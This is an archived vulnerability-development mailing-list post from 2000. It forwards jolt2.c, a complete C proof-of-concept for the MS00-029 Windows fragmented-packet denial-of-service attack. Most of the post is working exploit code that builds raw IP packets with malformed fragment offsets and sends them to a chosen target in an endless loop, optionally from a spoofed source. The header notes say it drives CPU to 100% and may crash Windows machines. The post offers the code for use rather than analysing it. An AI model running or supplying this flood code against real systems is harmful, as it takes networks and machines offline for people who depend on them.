Vulnerability Development mailing list archives
FW: Windows DoS code (jolt2.c) (fwd)
From: marc () EEYE COM (Marc)
Date: Thu, 25 May 2000 13:33:34 -0700
Someone was asking for this a few days ago... so here it is. Signed, Marc Maiffret Chief Hacking Officer eCompany / eEye T.949.675.8194 F.949.675.8294 http://eEye.com | -----Original Message----- | From: Windows NTBugtraq Mailing List | [mailto:NTBUGTRAQ () LISTSERV NTBUGTRAQ COM]On Behalf Of Phonix Monkey | Sent: Thursday, May 25, 2000 8:42 AM | To: NTBUGTRAQ () LISTSERV NTBUGTRAQ COM | Subject: Windows DoS code (jolt2.c) (fwd) | | | This is code for the new DoS discovered by Razor a few days ago. It | forces cpu utilization to 100%, making everything move really really | slow. Tested against Win98, WinNT4/sp5,6, Win2K. | | An interesting side note is that minor changes to this packet cause | NT4/Win2k (maybe others, not tested) memory use to jump | *substantially* (+70 meg non-paged-pool on a machine with 196 mb | phys). There seems to be a hard upper limit, but on machines with smaller | amounts of memory or smaller swapfiles, ramping up the non-paged-pool this | much might lead to a BSOD. | | .phonix. | | | | | /* | * File: jolt2.c | * Author: Phonix <phonix () moocow org> | * Date: 23-May-00 | * | * Description: This is the proof-of-concept code for the | * Windows denial-of-serice attack described by | * the Razor team (NTBugtraq, 19-May-00) | * (MS00-029). This code causes cpu utilization | * to go to 100%. | * | * Tested against: Win98; NT4/SP5,6; Win2K | * | * Written for: My Linux box. YMMV. Deal with it. | * | * Thanks: This is standard code. Ripped from lots of places. | * Insert your name here if you think you wrote some of | * it. It's a trivial exploit, so I won't take credit | * for anything except putting this file together. | */ | | #include <stdio.h> | #include <string.h> | #include <netdb.h> | #include <sys/socket.h> | #include <sys/types.h> | #include <netinet/in.h> | #include <netinet/ip.h> | #include <netinet/ip_icmp.h> | #include <netinet/udp.h> | #include <arpa/inet.h> | #include <getopt.h> | | struct _pkt | { | struct iphdr ip; | union { | struct icmphdr icmp; | struct udphdr udp; | } proto; | char data; | } pkt; | | int icmplen = sizeof(struct icmphdr), | udplen = sizeof(struct udphdr), | iplen = sizeof(struct iphdr), | spf_sck; | | void usage(char *pname) | { | fprintf (stderr, "Usage: %s [-s src_addr] [-p port] dest_addr\n", | pname); | fprintf (stderr, "Note: UDP used if a port is specified, | otherwise ICMP\n"); | exit(0); | } | | u_long host_to_ip(char *host_name) | { | static u_long ip_bytes; | struct hostent *res; | | res = gethostbyname(host_name); | if (res == NULL) | return (0); | memcpy(&ip_bytes, res->h_addr, res->h_length); | return (ip_bytes); | } | | void quit(char *reason) | { | perror(reason); | close(spf_sck); | exit(-1); | } | | int do_frags (int sck, u_long src_addr, u_long dst_addr, int port) | { | int bs, psize; | unsigned long x; | struct sockaddr_in to; | | to.sin_family = AF_INET; | to.sin_port = 1235; | to.sin_addr.s_addr = dst_addr; | | if (port) | psize = iplen + udplen + 1; | else | psize = iplen + icmplen + 1; | memset(&pkt, 0, psize); | | pkt.ip.version = 4; | pkt.ip.ihl = 5; | pkt.ip.tot_len = htons(iplen + icmplen) + 40; | pkt.ip.id = htons(0x455); | pkt.ip.ttl = 255; | pkt.ip.protocol = (port ? IPPROTO_UDP : IPPROTO_ICMP); | pkt.ip.saddr = src_addr; | pkt.ip.daddr = dst_addr; | pkt.ip.frag_off = htons (8190); | | if (port) | { | pkt.proto.udp.source = htons(port|1235); | pkt.proto.udp.dest = htons(port); | pkt.proto.udp.len = htons(9); | pkt.data = 'a'; | } else { | pkt.proto.icmp.type = ICMP_ECHO; | pkt.proto.icmp.code = 0; | pkt.proto.icmp.checksum = 0; | } | | while (1) { | bs = sendto(sck, &pkt, psize, 0, (struct sockaddr *) &to, | sizeof(struct sockaddr)); | } | return bs; | } | | int main(int argc, char *argv[]) | { | u_long src_addr, dst_addr; | int i, bs=1, port=0; | char hostname[32]; | | if (argc < 2) | usage (argv[0]); | | gethostname (hostname, 32); | src_addr = host_to_ip(hostname); | | while ((i = getopt (argc, argv, "s:p:h")) != EOF) | { | switch (i) | { | case 's': | dst_addr = host_to_ip(optarg); | if (!dst_addr) | quit("Bad source address given."); | break; | | case 'p': | port = atoi(optarg); | if ((port <=0) || (port > 65535)) | quit ("Invalid port number given."); | break; | | case 'h': | default: | usage (argv[0]); | } | } | | dst_addr = host_to_ip(argv[argc-1]); | if (!dst_addr) | quit("Bad destination address given."); | | spf_sck = socket(AF_INET, SOCK_RAW, IPPROTO_RAW); | if (!spf_sck) | quit("socket()"); | if (setsockopt(spf_sck, IPPROTO_IP, IP_HDRINCL, (char *)&bs, | sizeof(bs)) < 0) | quit("IP_HDRINCL"); | | do_frags (spf_sck, src_addr, dst_addr, port); | } |
Current thread:
- FW: Windows DoS code (jolt2.c) (fwd) Marc (May 25)